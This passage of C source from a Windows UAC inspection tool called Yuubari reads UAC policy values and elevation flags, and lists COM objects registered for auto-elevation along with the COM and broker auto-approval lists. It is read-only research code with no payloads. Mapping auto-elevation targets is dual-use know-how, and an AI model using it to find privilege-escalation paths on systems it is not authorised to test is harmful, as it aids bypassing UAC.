} AI_DATA_TYPE;
typedef struct _UAC_AI_DATA {
LPWSTR Name;
SIZE_T Length;
AI_DATA_TYPE Type;
} UAC_AI_DATA, *PUAC_AI_DATA;
typedef struct _UAC_MMC_BLOCK {
LPWSTR lpManagementApplication;
PVOID Base;
ULONG NumOfElements;
ULONG Reserved;
} UAC_MMC_BLOCK, *PUAC_MMC_BLOCK;
typedef struct _UAC_AI_GLOBALS {
ULONG AppInfoBuildNumber;
PVOID DllBase;
SIZE_T DllVirtualSize;
UAC_MMC_BLOCK *MmcBlock;
PVOID *lpIncludedWindowsDirs;
PVOID *lpIncludedPFDirs;
PVOID *lpAutoApproveEXEList;
PVOID *lpIncludedSystemDirs;
PVOID *lpExemptedAutoApproveExes;
PVOID *lpExcludedWindowsDirs;
} UAC_AI_GLOBALS, *PUAC_AI_GLOBALS;
typedef DWORD(WINAPI *pfnSymSetOptions)(
_In_ DWORD SymOptions);
typedef BOOL(WINAPI *pfnSymInitializeW)(
_In_ HANDLE hProcess,
_In_opt_ PCWSTR UserSearchPath,
_In_ BOOL fInvadeProcess);
typedef BOOL(WINAPI* pfnSymFromNameW)(
_In_ HANDLE hProcess,
_In_ PCWSTR Name,
_Inout_ PSYMBOL_INFOW Symbol);
typedef DWORD64(WINAPI *pfnSymLoadModuleExW)(
_In_ HANDLE hProcess,
_In_opt_ HANDLE hFile,
_In_opt_ PCWSTR ImageName,
_In_opt_ PCWSTR ModuleName,
_In_ DWORD64 BaseOfDll,
_In_ DWORD DllSize,
_In_opt_ PMODLOAD_DATA Data,
_In_ DWORD Flags);
typedef BOOL(WINAPI *pfnSymUnloadModule64)(
_In_ HANDLE hProcess,
_In_ DWORD64 BaseOfDll);
typedef BOOL(WINAPI *pfnSymCleanup)(
_In_ HANDLE hProcess);
VOID ScanAppInfo(
LPWSTR lpFileName,
OUTPUTCALLBACK OutputCallback);
================================================
FILE: Source/Yuubari/basic.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: BASIC.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
VOID QueryAndOutputRegValue(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ HKEY hKey,
_In_ LPWSTR ValueName,
_In_ LPWSTR DisplayName,
_In_ BOOL IsBool
)
{
UAC_BASIC_DATA TempData;
ULONG Value = 0;
LRESULT Result = supRegReadDword(hKey, ValueName, &Value);
if (Result == ERROR_SUCCESS) {
RtlSecureZeroMemory(&TempData, sizeof(TempData));
TempData.Name = DisplayName;
TempData.IsValueBool = IsBool;
TempData.Value = Value;
OutputCallback((PVOID)&TempData);
}
}
/*
* ScanBasicUacData
*
* Purpose:
*
* Query UserSharedData flags, UAC registry values.
*
*/
VOID ScanBasicUacData(
_In_ OUTPUTCALLBACK OutputCallback
)
{
ULONG Flags = 0;
LRESULT lRet;
HKEY hKey = NULL;
UAC_BASIC_DATA Data;
if (OutputCallback == NULL)
return;
if (!NT_SUCCESS(RtlQueryElevationFlags(&Flags)))
return;
RtlSecureZeroMemory(&Data, sizeof(Data));
Data.Name = T_FLAG_ELEVATION_ENABLED;
Data.IsValueBool = TRUE;
Data.Value = ((Flags & DBG_FLAG_ELEVATION_ENABLED) > 0);
OutputCallback((PVOID)&Data);
Data.Name = T_FLAG_VIRTUALIZATION_ENABLED;
Data.IsValueBool = TRUE;
Data.Value = ((Flags & DBG_FLAG_VIRTUALIZATION_ENABLED) > 0);
OutputCallback((PVOID)&Data);
Data.Name = T_FLAG_INSTALLERDETECT_ENABLED;
Data.IsValueBool = TRUE;
Data.Value = ((Flags & DBG_FLAG_INSTALLER_DETECT_ENABLED) > 0);
OutputCallback((PVOID)&Data);
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_SETTINGS_KEY, 0, KEY_READ, &hKey);
if (lRet == ERROR_SUCCESS && hKey != NULL) {
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_PROMPT_BEHAVIOR, T_UAC_PROMPT_BEHAVIOR, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_RESTRICTED_AUTOAPPROVE, T_UAC_RESTRICTED_AUTOAPPROVE, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEIC, T_UAC_AUTOAPPROVEIC, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEMP, T_UAC_AUTOAPPROVEMP, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEHARDCLAIMS, T_UAC_AUTOAPPROVEHARDCLAIMS, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_ENABLESECUREUIPATHS, T_UAC_ENABLESECUREUIPATHS, FALSE);
QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_SECURE_DESKTOP, T_UAC_SECURE_DESKTOP, TRUE);
RegCloseKey(hKey);
}
}
================================================
FILE: Source/Yuubari/basic.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2020
*
* TITLE: BASIC.H
*
* VERSION: 1.49
*
* DATE: 11 Nov 2019
*
* Header file for the basic UAC info scan.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef struct _UAC_BASIC_DATA {
LPWSTR Name;
DWORD Value;
BOOL IsValueBool;
} UAC_BASIC_DATA, *PUAC_BASIC_DATA;
VOID ScanBasicUacData(
_In_ OUTPUTCALLBACK OutputCallback);
================================================
FILE: Source/Yuubari/comobj.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: COMOBJ.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include
#include
#include
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Rpcrt4.lib")
VOID CopScanRegistry(
_In_ HKEY RootKey,
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList);
/*
* CopRunOutputCallbackForInterface
*
* Purpose:
*
* Output interface information.
*
*/
VOID CopRunOutputCallbackForInterface(
_In_ ULONG DataType,
_In_ INTERFACE_INFO *Interface,
_In_ CLSID clsid,
_In_ OUTPUTCALLBACK OutputCallback
)
{
UAC_INTERFACE_DATA Data;
RtlSecureZeroMemory(&Data, sizeof(Data));
Data.DataType = DataType;
Data.Name = Interface->szInterfaceName;
Data.Clsid = clsid;
Data.IID = Interface->iid;
OutputCallback((PVOID)&Data);
}
/*
* CopLocateInterfaceByCLSID
*
* Purpose:
*
* Search for interface by CLSID.
*
*/
INTERFACE_INFO* CopLocateInterfaceByCLSID(
_In_ INTERFACE_INFO_LIST *InterfaceList,
_In_ CLSID clsid
)
{
IUnknown *Interface = NULL;
IUnknown *TestObject = NULL;
ULONG i;
INTERFACE_INFO* Result = NULL;
if (SUCCEEDED(CoCreateInstance(&clsid, NULL, CLSCTX_INPROC_SERVER,
&IID_IUnknown, (LPVOID)&Interface)))
{
for (i = 0; i < InterfaceList->cEntries; i++) {
Interface->lpVtbl->QueryInterface(Interface, &InterfaceList->List[i].iid, &TestObject);
if (TestObject != NULL) {
TestObject->lpVtbl->Release(TestObject);
Result = &InterfaceList->List[i];
break;
}
}
Interface->lpVtbl->Release(Interface);
}
return Result;
}
/*
* CopQuerySubKey
*
* Purpose:
*
* Query subkey elevated COM object name.
*
*/
VOID CopQuerySubKey(
_In_ HKEY RootKey,
_In_ LPWSTR lpKeyName,
_In_ BOOL ElevationKey,
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
LRESULT lRet;
HKEY hSubKey = NULL, hAppIdKey = NULL, hServerObjectsKey = NULL;
DWORD dwDataSize, dwEnabled = 0;
LPWSTR lpName = NULL, lpAppId = NULL, lpAppIdName = NULL, lpLocalizedString = NULL, t = NULL, lpValue = NULL;
ULONG i, cValues = 0, cMaxLength = 0, cchValue;
CLSID clsid;
UAC_REGISTRY_DATA Data;
INTERFACE_INFO *LookupInterface;
BOOLEAN VirtualFactory = FALSE;
//open each sub key
lRet = RegOpenKeyEx(RootKey, lpKeyName, 0, KEY_READ, &hSubKey);
if ((lRet == ERROR_SUCCESS) && (hSubKey != NULL)) {
if (ElevationKey) {
do {
dwDataSize = sizeof(DWORD);
dwEnabled = 0;
//query elevation enabled
lRet = RegQueryValueEx(hSubKey, TEXT("Enabled"), NULL,
NULL,
(LPBYTE)&dwEnabled,
&dwDataSize
);
if (lRet != ERROR_SUCCESS)
break;
if (dwEnabled != 1)
break;
//
// Check virtual factory.
//
lRet = RegOpenKeyEx(RootKey, TEXT("VirtualServerObjects"), 0, KEY_READ, &hServerObjectsKey);
VirtualFactory = ((lRet == ERROR_SUCCESS) && (hServerObjectsKey != NULL));
//query object name
lpName = supReadKeyString(RootKey, TEXT(""), &dwDataSize);
//query localized string and convert it
dwDataSize = 0;
t = supReadKeyString(RootKey, TEXT("LocalizedString"), &dwDataSize);
if (t) {
lpLocalizedString = (LPWSTR)supHeapAlloc((SIZE_T)MAX_PATH * 2);
if (lpLocalizedString) {
SHLoadIndirectString(t, lpLocalizedString, MAX_PATH, NULL);
}
supHeapFree(t);
}
//check if AppId present
dwDataSize = 0;
t = supReadKeyString(RootKey, TEXT("AppId"), &dwDataSize);
if (t) {
lpAppId = (LPWSTR)supHeapAlloc((SIZE_T)dwDataSize + 32);
if (lpAppId) {
_strcpy(lpAppId, TEXT("AppId\\"));
_strcat(lpAppId, t);
//open AppId key
lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpAppId, 0,
KEY_READ, &hAppIdKey);
if (lRet == ERROR_SUCCESS) {
//check if AccessPermisions present
lRet = RegQueryValueEx(hAppIdKey, TEXT("AccessPermission"),
NULL, NULL, NULL, NULL);
if (lRet == ERROR_SUCCESS) {
//if they found query name
dwDataSize = 0;
lpAppIdName = supReadKeyString(hAppIdKey, TEXT(""), &dwDataSize);
}
RegCloseKey(hAppIdKey);
}
}
supHeapFree(t);
}
//
// Write output
//
RtlSecureZeroMemory(&Data, sizeof(Data));
if (lpName) {
Data.Name = lpName;
}
else {
Data.Name = TEXT("undefined");
}
if (lpAppIdName) {
Data.AppId = lpAppIdName;
}
else {
if (lpAppId) {
Data.AppId = lpAppId;
}
else {
Data.AppId = TEXT("undefined");
}
}
if (lpLocalizedString) {
Data.LocalizedString = lpLocalizedString;
}
else {
Data.LocalizedString = TEXT("undefined");
}
Data.Key = (LPWSTR)supQueryKeyName(RootKey, NULL);
if (VirtualFactory)
Data.DataType = UacCOMDataVirtualFactory;
else
Data.DataType = UacCOMDataCommonType;
OutputCallback((PVOID)&Data);
if (Data.Key) {
supHeapFree(Data.Key);
}
//
// Output virtual server objects.
//
if (VirtualFactory) {
lRet = RegQueryInfoKey(hServerObjectsKey, NULL, NULL, NULL, NULL, NULL, NULL,
&cValues, &cMaxLength, NULL, NULL, NULL);
if (lRet == ERROR_SUCCESS) {
cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));
lpValue = (LPWSTR)supHeapAlloc(cMaxLength);
if (lpValue) {
for (i = 0; i < cValues; i++) {
cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));
if (RegEnumValue(hServerObjectsKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
if (CLSIDFromString(lpValue, &clsid) == S_OK) {
LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);
if (LookupInterface) {
CopRunOutputCallbackForInterface(
UacCOMDataInterfaceTypeVF,
LookupInterface,
clsid,
OutputCallback);
}
}
}
}
supHeapFree(lpValue);
}
}
RegCloseKey(hServerObjectsKey);
}
} while (FALSE);
if (lpAppIdName)
supHeapFree(lpAppIdName);
if (lpAppId != NULL)
supHeapFree(lpAppId);
if (lpName != NULL)
supHeapFree(lpName);
}
else {
CopScanRegistry(hSubKey, OutputCallback, InterfaceList);
}
RegCloseKey(hSubKey);
}
}
/*
* CopEnumSubKey
*
* Purpose:
*
* Enumerate key subkeys, check elevation flag.
*
*/
VOID CopEnumSubKey(
_In_ HKEY hKey,
_In_ DWORD dwKeyIndex,
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
BOOL bElevation = FALSE;
LRESULT lRet;
DWORD dwcbName = 0, cch;
LPTSTR lpKeyName = NULL;
do {
dwcbName = 32 * 1024;
lpKeyName = (LPTSTR)supHeapAlloc(dwcbName);
if (lpKeyName == NULL)
break;
cch = dwcbName / sizeof(WCHAR);
lRet = RegEnumKeyEx(hKey, dwKeyIndex,
lpKeyName, &cch, NULL, NULL, NULL, NULL);
if (lRet == ERROR_MORE_DATA) {
dwcbName *= 2;
supHeapFree(lpKeyName);
lpKeyName = NULL;
continue;
}
if (lRet == ERROR_SUCCESS) {
//skip wow64 shit
if (_strcmpi(lpKeyName, TEXT("Wow6432Node")) == 0)
break;
if (_strcmpi(lpKeyName, TEXT("Elevation")) == 0)
bElevation = TRUE;
CopQuerySubKey(hKey, lpKeyName, bElevation, OutputCallback, InterfaceList);
}
} while (lRet == ERROR_MORE_DATA);
if (lpKeyName != NULL)
supHeapFree(lpKeyName);
}
/*
* CopScanRegistry
*
* Purpose:
*
* Recursively scan registry looking for autoelevated COM entries.
*
*/
VOID CopScanRegistry(
_In_ HKEY RootKey,
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
HKEY hKey = NULL;
LRESULT lRet;
DWORD dwcSubKeys = 0, i;
do {
//open root key for enumeration
lRet = RegOpenKeyEx(RootKey, NULL, 0, KEY_READ, &hKey);
if ((lRet != ERROR_SUCCESS) || (hKey == NULL))
break;
//query subkeys count
lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwcSubKeys,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
if ((lRet != ERROR_SUCCESS) || (dwcSubKeys == 0))
break;
for (i = 0; i < dwcSubKeys; i++)
CopEnumSubKey(hKey, i, OutputCallback, InterfaceList);
} while (FALSE);
if (hKey != NULL)
RegCloseKey(hKey);
}
/*
* CoEnumInterfaces
*
* Purpose:
*
* Remember list of available interfaces, excluding IUnknown.
*
*/
BOOL CoEnumInterfaces(
_Inout_ INTERFACE_INFO_LIST *InterfaceList
)
{
BOOL bResult = FALSE;
HKEY hKey = NULL;
LRESULT lRet;
RPC_STATUS RpcStatus = 0;
LPWSTR lpKeyName = NULL;
SIZE_T k;
DWORD i, cSubKeys = 0, cMaxLength = 0, cchKey;
IID iid;
INTERFACE_INFO *infoBuffer;
__try {
lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, TEXT("Interface"), 0, KEY_READ, &hKey);
if (lRet != ERROR_SUCCESS)
__leave;
lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,
NULL, NULL, NULL, NULL, NULL);
if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))
__leave;
if (cSubKeys > 0xFFFF) {
__leave;
}
infoBuffer = (INTERFACE_INFO*)supHeapAlloc(cSubKeys * sizeof(INTERFACE_INFO));
if (infoBuffer == NULL)
__leave;
cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));
lpKeyName = (LPWSTR)supHeapAlloc(cMaxLength);
if (lpKeyName == NULL)
__leave;
for (k = 0, i = 0; i < cSubKeys; i++) {
cchKey = (DWORD)(cMaxLength / sizeof(WCHAR));
if (RegEnumKeyEx(hKey, i, lpKeyName, &cchKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
if (IIDFromString(lpKeyName, &iid) == S_OK) {
//skip IUnknown
if (UuidCompare((UUID*)&iid, (UUID*)&IID_IUnknown, &RpcStatus) == 0)
continue;
cchKey = MAX_PATH * sizeof(WCHAR);
infoBuffer[k].iid = iid;
RegGetValue(hKey, lpKeyName, TEXT(""), RRF_RT_REG_SZ, NULL,
(LPWSTR)&infoBuffer[k].szInterfaceName, &cchKey);
k++;
if (k >= cSubKeys)
break;
}
}
}
InterfaceList->cEntries = (ULONG)k;
InterfaceList->List = infoBuffer;
bResult = TRUE;
}
__finally {
if (hKey)
RegCloseKey(hKey);
if (lpKeyName)
supHeapFree(lpKeyName);
}
return bResult;
}
/*
* CoScanAutoApprovalList
*
* Purpose:
*
* Query list of autoapproval COM objects used by OOBE ICreateObject interface.
*
*/
VOID CoScanBrokerApprovalList(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
HKEY hKey = NULL, hSubKey = NULL;
LRESULT lRet;
LPWSTR lpSubKey = NULL;
DWORD i, cSubKeys = 0, cMaxLength = 0, cchSubKey, dwType, dwData, cbData;
CLSID clsid;
INTERFACE_INFO *LookupInterface;
__try {
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_BROKER_APPROVAL_LIST, 0, KEY_READ, &hKey);
if (lRet != ERROR_SUCCESS)
__leave;
lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,
NULL, NULL, NULL, NULL, NULL);
if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))
__leave;
cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));
lpSubKey = (LPWSTR)supHeapAlloc(cMaxLength);
if (lpSubKey == NULL)
__leave;
for (i = 0; i < cSubKeys; i++) {
cchSubKey = (DWORD)(cMaxLength / sizeof(WCHAR));
if (RegEnumKeyEx(hKey, i, lpSubKey, &cchSubKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
//
// Check AutoElevationAllowed
//
if (RegOpenKey(hKey, lpSubKey, &hSubKey) == ERROR_SUCCESS) {
dwType = REG_DWORD;
cbData = sizeof(DWORD);
dwData = 0;
if (RegQueryValueEx(hSubKey,
TEXT("AutoElevationAllowed"),
0,
&dwType,
(LPBYTE)&dwData,
&cbData) == ERROR_SUCCESS)
{
if ((cbData == sizeof(DWORD)) && (dwData == 1)) {
//
// Find interface and output to the callback.
//
if (CLSIDFromString(lpSubKey, &clsid) == S_OK) {
LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);
if (LookupInterface) {
CopRunOutputCallbackForInterface(
UacCOMDataInterfaceType,
LookupInterface,
clsid,
OutputCallback);
}
}
}
}
RegCloseKey(hSubKey);
}
}
}
}
__finally {
if (hKey)
RegCloseKey(hKey);
if (lpSubKey)
supHeapFree(lpSubKey);
}
}
/*
* CoScanAutoApprovalList
*
* Purpose:
*
* Query list of autoapproval COM objects.
* This key was added in RS1 specially for consent.exe comfort
*
*/
VOID CoScanAutoApprovalList(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
HKEY hKey = NULL;
LRESULT lRet;
LPWSTR lpValue = NULL;
DWORD i, cValues = 0, cMaxLength = 0, cchValue;
CLSID clsid;
INTERFACE_INFO *LookupInterface;
__try {
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_COM_AUTOAPPROVAL_LIST, 0, KEY_READ, &hKey);
if (lRet != ERROR_SUCCESS)
__leave;
lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL,
&cValues, &cMaxLength, NULL, NULL, NULL);
if ((lRet != ERROR_SUCCESS) || (cValues == 0))
__leave;
cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));
lpValue = (LPWSTR)supHeapAlloc(cMaxLength);
if (lpValue == NULL)
__leave;
for (i = 0; i < cValues; i++) {
cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));
if (RegEnumValue(hKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
if (CLSIDFromString(lpValue, &clsid) == S_OK) {
LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);
if (LookupInterface) {
CopRunOutputCallbackForInterface(
UacCOMDataInterfaceType,
LookupInterface,
clsid,
OutputCallback);
}
}
}
}
}
__finally {
if (hKey)
RegCloseKey(hKey);
if (lpValue)
supHeapFree(lpValue);
}
}
/*
* CoListInformation
*
* Purpose:
*
* Scan registry looking for autoelevated COM.
*
*/
VOID CoListInformation(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList
)
{
if (OutputCallback) {
CopScanRegistry(HKEY_CLASSES_ROOT, OutputCallback, InterfaceList);
}
}
================================================
FILE: Source/Yuubari/comobj.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2019
*
* TITLE: COMOBJ.H
*
* VERSION: 1.45
*
* DATE: 22 Oct 2019
*
* Header file for the COM registry objects scan.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#define UacCOMDataCommonType 0
#define UacCOMDataInterfaceType 1
#define UacCOMDataInterfaceTypeVF 2
#define UacCOMDataVirtualFactory 3
typedef struct _INTERFACE_INFO {
IID iid;
WCHAR szInterfaceName[MAX_PATH];
} INTERFACE_INFO, *PINTERFACE_INFO;
typedef struct _INTERFACE_INFO_LIST {
ULONG cEntries;
INTERFACE_INFO *List;
} INTERFACE_INFO_LIST, *PINTERFACE_INFO_LIST;
typedef struct _UAC_INTERFACE_DATA {
DWORD DataType;
LPWSTR Name;
CLSID Clsid;
IID IID;
} UAC_INTERFACE_DATA, *PUAC_INTERFACE_DATA;
typedef struct _UAC_REGISTRY_DATA {
DWORD DataType;
LPWSTR Name;
LPWSTR Key;
LPWSTR AppId;
LPWSTR LocalizedString;
} UAC_REGISTRY_DATA, *PUAC_REGISTRY_DATA;
VOID CoListInformation(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList);
BOOL CoEnumInterfaces(
_Inout_ INTERFACE_INFO_LIST *InterfaceList);
VOID CoScanAutoApprovalList(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList);
VOID CoScanBrokerApprovalList(
_In_ OUTPUTCALLBACK OutputCallback,
_In_ INTERFACE_INFO_LIST *InterfaceList);
================================================
FILE: Source/Yuubari/consts.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2026
*
* TITLE: CONSTS.H
*
* VERSION: 1.61
*
* DATE: 12 Feb 2026
*
* Global consts definition file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#define YUUBARI_MIN_SUPPORTED_NT_BUILD NT_WIN7_RTM
#define YUUBARI_MAX_SUPPORTED_NT_BUILD NT_WIN11_24H2
#define T_UAC_COM_AUTOAPPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList") //RS1+
#define T_UAC_BROKER_APPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CloudExperienceHost\\Broker\\ElevatedClsids")
#define T_UAC_SETTINGS_KEY TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
#define T_UAC_PROMPT_BEHAVIOR TEXT("ConsentPromptBehaviorAdmin")
#define T_UAC_SECURE_DESKTOP TEXT("PromptOnSecureDesktop")
#define T_UAC_RESTRICTED_AUTOAPPROVE TEXT("EnableRestrictedAutoApprove") //RS1+
#define T_UAC_AUTOAPPROVEIC TEXT("EnableAutoApproveIntegrityContinuity") //RS2+, AipAutoApproveHardeningPolicy
#define T_UAC_AUTOAPPROVEMP TEXT("AutoApproveMitigationPolicy") //RS2+, AipAutoApproveHardeningPolicy
#define T_UAC_AUTOAPPROVEHARDCLAIMS TEXT("AutoApproveHardeningClaims") //RS2+, AipMarkAutoApprovedToken(TokenSecurityAttributes)
#define T_UAC_ENABLESECUREUIPATHS TEXT("EnableSecureUIAPaths") //RS2+, Only elevate UIAccess applications that are installed in secure locations
#define T_FLAG_ELEVATION_ENABLED TEXT("ElevationEnabled")
#define T_FLAG_VIRTUALIZATION_ENABLED TEXT("VirtualizationEnabled")
#define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled")
#define T_PROGRAM_NAME TEXT("Yuubari")
#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.6.1 (Feb 12, 2026)\r\n")
#define T_HELP TEXT("Optional parameters to execute: \r\n\n\
YUUBARI [/v] \r\n\n\
/v - produce verbose output.")
#define T_SPLIT TEXT("===============================================================")
#define T_BASIC_HEAD TEXT("\r\n[UacView] Basic UAC settings\r\n")
#define T_COM_HEAD TEXT("\r\n[UacView] Autoelevated COM objects\r\n")
#define T_COM_APPROVE_HEAD TEXT("\r\n[UacView] COMAutoApproval list\r\n")
#define T_BROKER_APPROVE_HEAD TEXT("\r\n[UacView] Broker approval list\r\n")
#define T_WINFILES_HEAD TEXT("\r\n[UacView] Autoelevated applications in Windows directory\r\n")
#define T_PFDIRFILES_HEAD TEXT("\r\n[UacView] Autoelevated applications in Program Files directory\r\n")
#define T_APPINFO_HEAD TEXT("\r\n[UacView] Appinfo data\r\n")
================================================
FILE: Source/Yuubari/cui.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2025
*
* TITLE: CUI.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* Console output.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
HANDLE g_ConOut = NULL, g_ConIn = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
const SIZE_T MAX_CONSOLE_OUTPUT = 4096;
/*
* cuiInitialize
*
* Purpose:
*
* Initialize console input/output.
*
*/
VOID cuiInitialize(
_In_ BOOL InitInput,
_Out_opt_ PBOOL IsConsoleOutput
)
{
ULONG dummy;
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (g_ConOut == INVALID_HANDLE_VALUE || g_ConOut == NULL) {
g_ConOut = GetStdHandle(STD_ERROR_HANDLE);
}
if (InitInput) {
g_ConIn = GetStdHandle(STD_INPUT_HANDLE);
if (g_ConIn == INVALID_HANDLE_VALUE) {
g_ConIn = NULL;
}
}
g_ConsoleOutput = TRUE;
if (g_ConOut != INVALID_HANDLE_VALUE && g_ConOut != NULL) {
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
if (!GetConsoleMode(g_ConOut, &dummy)) {
g_ConsoleOutput = FALSE;
WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);
}
}
else {
g_ConsoleOutput = FALSE;
}
if (IsConsoleOutput)
*IsConsoleOutput = g_ConsoleOutput;
return;
}
/*
* cuiClrScr
*
* Purpose:
*
* Clear screen.
*
*/
VOID cuiClrScr(
VOID
)
{
COORD coordScreen;
DWORD cCharsWritten;
DWORD dwConSize;
CONSOLE_SCREEN_BUFFER_INFO csbi;
coordScreen.X = 0;
coordScreen.Y = 0;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),
dwConSize, coordScreen, &cCharsWritten))
return;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,
dwConSize, coordScreen, &cCharsWritten))
return;
SetConsoleCursorPosition(g_ConOut, coordScreen);
}
/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
* ANSI version.
*
*/
VOID cuiPrintTextA(
_In_ LPSTR lpText,
_In_ BOOL UseReturn
)
{
BOOL writeSuccess;
DWORD bytesIO;
SIZE_T consoleIO, bufferSize, copySize;
LPSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen_a(lpText);
if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)
return;
if (UseReturn) {
bufferSize = consoleIO + 3;
}
else {
bufferSize = consoleIO + 1;
}
